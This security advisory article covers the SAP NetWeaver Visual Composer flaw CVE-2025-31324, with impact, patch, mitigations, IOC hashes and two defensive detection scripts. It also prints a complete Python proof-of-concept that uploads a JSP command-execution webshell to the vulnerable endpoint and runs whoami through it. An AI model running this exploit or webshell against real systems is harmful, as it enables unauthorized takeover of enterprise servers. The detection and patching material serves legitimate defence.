Critical SAP Vulnerability CVE-2025-31324: What You Need to Know

In the fast-evolving world of cybersecurity, a new threat has emerged that demands immediate attention from organizations relying on SAP systems. The recently disclosed SAP vulnerability, CVE-2025-31324, has sent shockwaves through the enterprise landscape due to its critical severity and active exploitation in the wild. With a perfect CVSS score of 10.0, this flaw in SAP NetWeaver Visual Composer poses a significant risk, allowing unauthenticated attackers to compromise entire systems. In this article, we dive deep into the vulnerability, its impact, and the urgent steps organizations must take to protect their critical infrastructure.

A Perfect Storm: Understanding CVE-2025-31324

At its core, CVE-2025-31324 is an unrestricted file upload vulnerability in the SAP NetWeaver Visual Composer Metadata Uploader, specifically affecting the /developmentserver/metadatauploader endpoint. This flaw enables attackers to upload malicious files, such as JSP webshells (e.g., helper.jsp, cache.jsp), without requiring authentication. Once uploaded, these files can be accessed remotely, granting attackers the ability to execute arbitrary code and seize full control of the compromised system.

The vulnerability’s unauthenticated nature makes it particularly dangerous, as no credentials are needed to exploit it. Attackers can craft POST requests to upload webshells, which are then accessible via GET requests, enabling remote command execution. The consequences are dire: compromised confidentiality, integrity, and availability of critical SAP systems, which are often the backbone of enterprise operations.

Security researchers have noted advanced exploitation techniques, including the deployment of Brute Ratel, a sophisticated command-and-control (C2) framework, and Heaven’s Gate, a memory manipulation tactic to evade detection. Attackers have also been observed uploading C# code, compiling it with MSBuild, and injecting it into dllhost.exe for persistence, showcasing the vulnerability’s potential for advanced persistent threats (APTs).

Proof of Concept (example):

python CVE-2025-31324_PoC.py http://test-sap-server:50000

import requests
import sys

# Target SAP NetWeaver server details (replace with test environment values)
TARGET_URL = "http://<target-sap-server>:50000/developmentserver/metadatauploader"
WEBSHELL_NAME = "helper.jsp"

# Malicious JSP webshell payload
# This creates a simple webshell allowing command execution via a GET parameter 'cmd'
WEBSHELL_PAYLOAD = """
<%@ page import="java.io.*" %>
<% 
    String cmd = request.getParameter("cmd");
    if (cmd != null) {
        Process p = Runtime.getRuntime().exec(cmd);
        BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));
        String line;
        while ((line = br.readLine()) != null) {
            out.println(line);
        }
        br.close();
    }
%>
"""

def upload_webshell():
    """Upload the malicious JSP webshell to the vulnerable endpoint."""
    files = {
        "file": (WEBSHELL_NAME, WEBSHELL_PAYLOAD, "application/octet-stream")
    }
    try:
        print(f"[*] Attempting to upload webshell to {TARGET_URL}")
        response = requests.post(TARGET_URL, files=files, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Webshell uploaded successfully! Access it at: {TARGET_URL}/{WEBSHELL_NAME}")
            return True
        else:
            print(f"[-] Upload failed. Status code: {response.status_code}")
            return False
    except requests.RequestException as e:
        print(f"[-] Error during upload: {e}")
        return False

def test_webshell():
    """Test the uploaded webshell by executing a simple command."""
    test_url = f"{TARGET_URL}/{WEBSHELL_NAME}?cmd=whoami"
    try:
        print(f"[*] Testing webshell with command: whoami")
        response = requests.get(test_url, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Webshell is active! Response:\n{response.text}")
        else:
            print(f"[-] Webshell test failed. Status code: {response.status_code}")
    except requests.RequestException as e:
        print(f"[-] Error during test: {e}")

def main():
    """Main function to execute the PoC."""
    print("[*] CVE-2025-31324 PoC - SAP NetWeaver Visual Composer Unrestricted File Upload")
    print("[*] For authorized penetration testing only in a controlled environment.")
    
    # Step 1: Upload the webshell
    if upload_webshell():
        # Step 2: Test the webshell if upload succeeds
        test_webshell()
    else:
        print("[-] PoC execution failed.")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python CVE-2025-31324_PoC.py <target_sap_server>")
        print("Example: python CVE-2025-31324_PoC.py http://test-sap-server:50000")
        sys.exit(1)
    
    TARGET_URL = sys.argv[1] + "/developmentserver/metadatauploader"
    main()

Proof of Concept: A Double-Edged Sword

For authorized penetration testers, public proof-of-concept (PoC) exploits are available on GitHub, with at least 11 repositories documented on platforms like cvefeed.io. Notably, Onapsis Research Labs released an open-source scanner on April 27, 2025, under the Apache License 2.0, enabling non-intrusive detection of the vulnerable component and patch status.

While these PoCs are invaluable for controlled testing in isolated environments, they also highlight the ease of exploitation. Ethical testers must use these tools responsibly, ensuring compliance with legal and regulatory requirements, such as GDPR, SOX, and FDA regulations, to avoid unintended consequences.

Who’s at Risk?

The vulnerability affects all SAP NetWeaver 7.xx versions, regardless of Support Package Stacks (SPS). Organizations running unsupported versions, such as SAP NetWeaver Application Server Java 7.40 or below, face heightened risks, as these systems no longer receive security updates. Given SAP’s widespread use in industries like finance, manufacturing, and healthcare, the potential impact spans critical business operations globally.

Security firms, including Onapsis, ReliaQuest, and Tenable, have confirmed active exploitation since at least April 22, 2025. With 28.3% of vulnerabilities exploited within 24 hours of disclosure in Q1 2025, this zero-day flaw represents an urgent threat to unpatched systems.

The Patch: Act Now or Pay the Price

On April 24, 2025, SAP released an emergency patch through Security Note 3594142, addressing the vulnerability. Organizations must apply this patch immediately to mitigate the risk of exploitation. For systems where immediate patching isn’t feasible, SAP recommends temporary mitigations, including:

  • Disabling the Visual Composer component if it’s not in use.
  • Blocking access to the /developmentserver/metadatauploader endpoint at the network level.
  • Monitoring for indicators of compromise (IOCs), such as:
    • Webshell files: helper.jsp (SHA-256: 1f72bd2643995fab4ecf7150b6367fa1b3fab17afd2abed30a98f075e4913087)
    • Webshell files: cache.jsp (SHA-256: 794cb0a92f51e1387a6b316b8b5ff83d33a51ecf9bf7cc8e88a619ecb64f1dcf)
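The two SHA-256 hashes above are the kind of indicator that can be swept for directly on the file system. The script below is an added example and is not part of SAP's guidance or the original article: it walks a directory tree, hashes every file with SHA-256, reports any file matching the published hashes for helper.jsp and cache.jsp, and separately reports any .jsp file modified after a chosen cutoff time, since the uploaded webshells need not keep their original names or content. The directory layout, sample files and cutoff used in the demonstration are constructed; on a real host the scan root would be the NetWeaver Java server's web content directories.

```python
"""Sweep a directory tree for the CVE-2025-31324 webshell IOCs.

Added example, not from the original article. Matches files against the
SHA-256 hashes published for helper.jsp and cache.jsp, and flags recently
modified .jsp files that a hash list alone would miss.
"""
import hashlib
import os
import tempfile
import time
from dataclasses import dataclass
from pathlib import Path
from typing import Dict, List

# SHA-256 hashes of the two webshells, as listed in the mitigation guidance above.
KNOWN_WEBSHELL_HASHES: Dict[str, str] = {
    "1f72bd2643995fab4ecf7150b6367fa1b3fab17afd2abed30a98f075e4913087": "helper.jsp",
    "794cb0a92f51e1387a6b316b8b5ff83d33a51ecf9bf7cc8e88a619ecb64f1dcf": "cache.jsp",
}


@dataclass
class Finding:
    path: str
    reason: str  # "known_hash:<name>" or "new_jsp"


def sha256_of_file(path: Path, chunk_size: int = 65536) -> str:
    """Hash a file in chunks so large archives do not need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_tree(root: Path, known_hashes: Dict[str, str], modified_after: float) -> List[Finding]:
    """Walk `root`; report known-bad hashes and .jsp files newer than `modified_after` (epoch seconds)."""
    findings: List[Finding] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            try:
                digest = sha256_of_file(p)
                mtime = p.stat().st_mtime
            except OSError:
                continue  # unreadable file: skip rather than abort the whole sweep
            if digest in known_hashes:
                findings.append(Finding(str(p), f"known_hash:{known_hashes[digest]}"))
            elif p.suffix.lower() == ".jsp" and mtime >= modified_after:
                findings.append(Finding(str(p), "new_jsp"))
    return sorted(findings, key=lambda f: f.path)


def demo() -> List[str]:
    """Build a constructed directory tree and return the findings as 'name:reason' strings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        webapp = root / "webapp"
        webapp.mkdir()

        # Constructed: a long-standing legitimate JSP page (mtime set to a week ago).
        legit = webapp / "legit.jsp"
        legit.write_text("<%-- constructed legitimate page --%>")
        week_ago = time.time() - 7 * 86400
        os.utime(legit, (week_ago, week_ago))

        # Constructed: a JSP file that appeared just now, with no known hash.
        (webapp / "suspicious.jsp").write_text("<%-- constructed sample --%>")

        # Constructed: a file whose hash we add to the IOC list to exercise the hash match.
        planted = webapp / "planted.bin"
        planted.write_bytes(b"constructed sample bytes")
        hashes = dict(KNOWN_WEBSHELL_HASHES)
        hashes[sha256_of_file(planted)] = "constructed-sample"

        cutoff = time.time() - 86400  # anything modified in the last 24 hours is "new"
        return [f"{Path(f.path).name}:{f.reason}" for f in scan_tree(root, hashes, cutoff)]


if __name__ == "__main__":
    for line in demo():
        print(line)
```

In production the cutoff would be the date the vulnerability was first exploited in the wild (April 22, 2025, per the article), and the scan root the server's deployed web content, so that every JSP written since then is reviewed rather than only those matching the two published hashes.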

Proactive organizations should also integrate threat hunting and red-blue team exercises to validate patch effectiveness and enhance detection capabilities. Monitoring for suspicious JSP file uploads and deploying detection rules in security operations centers (SOCs) are critical steps to bolster defenses.
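The exploitation pattern described earlier (an unauthenticated POST to /developmentserver/metadatauploader followed by GET requests to a JSP webshell) and the call above to deploy detection rules for suspicious JSP activity can both be expressed as a correlation over HTTP access logs. The detector below is an added example, not a rule from the article or from any vendor: it parses Common Log Format lines, raises a medium-severity alert on every POST to the uploader endpoint, and raises a high-severity alert on GET requests to .jsp files that either carry one of the webshell filenames named in the article or come from a client that hit the uploader within the preceding window. The log lines, client addresses and the /somewebapp/ path are constructed for demonstration.

```python
"""Correlate access-log events into alerts for the CVE-2025-31324 exploitation pattern.

Added example, not from the original article. Uploader POSTs are flagged on
their own; JSP GETs are flagged when they match a known webshell filename or
follow an uploader POST from the same client within a time window.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from posixpath import basename
from typing import Dict, List, Optional
from urllib.parse import urlsplit

UPLOADER_PATH = "/developmentserver/metadatauploader"
KNOWN_WEBSHELL_NAMES = {"helper.jsp", "cache.jsp"}  # filenames reported in the article

# Common Log Format: host ident user [time] "method target protocol" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+$'
)

# Constructed sample log lines (addresses from documentation ranges, paths invented).
SAMPLE_LOG_LINES = [
    '203.0.113.10 - - [25/Apr/2025:10:02:11 +0000] "POST /developmentserver/metadatauploader HTTP/1.1" 200 512',
    '198.51.100.7 - - [25/Apr/2025:10:02:20 +0000] "GET /irj/portal HTTP/1.1" 200 4096',
    '203.0.113.10 - - [25/Apr/2025:10:02:45 +0000] "GET /somewebapp/helper.jsp?cmd=whoami HTTP/1.1" 200 73',
    '198.51.100.7 - - [25/Apr/2025:10:06:30 +0000] "GET /somewebapp/welcome.jsp HTTP/1.1" 200 1200',
    '198.51.100.7 - - [25/Apr/2025:10:07:02 +0000] "GET /somewebapp/cache.jsp HTTP/1.1" 404 0',
]


def parse_line(line: str) -> Optional[Dict]:
    """Parse one CLF line into a dict; return None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    target = urlsplit(m["target"])
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": target.path,
        "query": target.query,
        "status": int(m["status"]),
    }


def detect_webshell_activity(lines: List[str], window: timedelta = timedelta(minutes=30)) -> List[Dict]:
    """Return alerts in time order for uploader POSTs and suspicious JSP GETs."""
    alerts: List[Dict] = []
    uploader_posts = defaultdict(list)  # client ip -> timestamps of POSTs to the uploader
    events = [e for e in map(parse_line, lines) if e is not None]
    events.sort(key=lambda e: e["ts"])

    for ev in events:
        path = ev["path"].lower()
        if ev["method"] == "POST" and path.startswith(UPLOADER_PATH):
            uploader_posts[ev["ip"]].append(ev["ts"])
            alerts.append({"severity": "medium", "ip": ev["ip"], "ts": ev["ts"],
                           "path": ev["path"], "indicators": [f"POST to {UPLOADER_PATH}"]})
            continue
        if ev["method"] == "GET" and path.endswith(".jsp"):
            indicators = []
            if basename(path) in KNOWN_WEBSHELL_NAMES:
                indicators.append("known webshell filename")
            recent = [t for t in uploader_posts[ev["ip"]] if timedelta(0) <= ev["ts"] - t <= window]
            if recent:
                gap = int((ev["ts"] - max(recent)).total_seconds())
                indicators.append(f"same client POSTed to uploader {gap}s earlier")
            if indicators:
                alerts.append({"severity": "high", "ip": ev["ip"], "ts": ev["ts"],
                               "path": ev["path"], "indicators": indicators})
    return alerts


if __name__ == "__main__":
    for alert in detect_webshell_activity(SAMPLE_LOG_LINES):
        print(alert["severity"], alert["ip"], alert["path"], "; ".join(alert["indicators"]))
```

Ordinary JSP traffic is normal on a NetWeaver Java stack, so the detector deliberately does not alert on every .jsp request; a GET to a JSP is only interesting here when it uses a reported webshell name or follows an uploader POST from the same client. A 404 on cache.jsp still produces an alert, because a probe for a known webshell name is worth seeing even when the file is absent.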

Why This Matters: The Bigger Picture

The rapid weaponization of CVE-2025-31324 underscores the growing sophistication of cyber threats targeting enterprise systems. With SAP systems handling sensitive business data, a successful exploit could lead to data breaches, regulatory fines, and reputational damage. Organizations must prioritize patching and adopt a defense-in-depth strategy, combining network restrictions, continuous monitoring, and simulated attack scenarios to stay ahead of adversaries.

As a cybersecurity expert, I recommend conducting risk assessments to identify vulnerable systems and document mitigation efforts for compliance. Collaboration between red and blue teams can further strengthen resilience, ensuring that defenses are tested and refined against real-world attack techniques.

Conclusion: Don’t Wait for the Breach

CVE-2025-31324 is a wake-up call for organizations relying on SAP NetWeaver. With active exploitation, public PoCs, and a perfect CVSS score, the time to act is now. By applying the emergency patch, monitoring for IOCs, and leveraging authorized testing tools, businesses can safeguard their critical assets and maintain operational integrity.

Stay vigilant, patch promptly, and fortify your defenses. In the world of cybersecurity, preparation is the key to resilience.
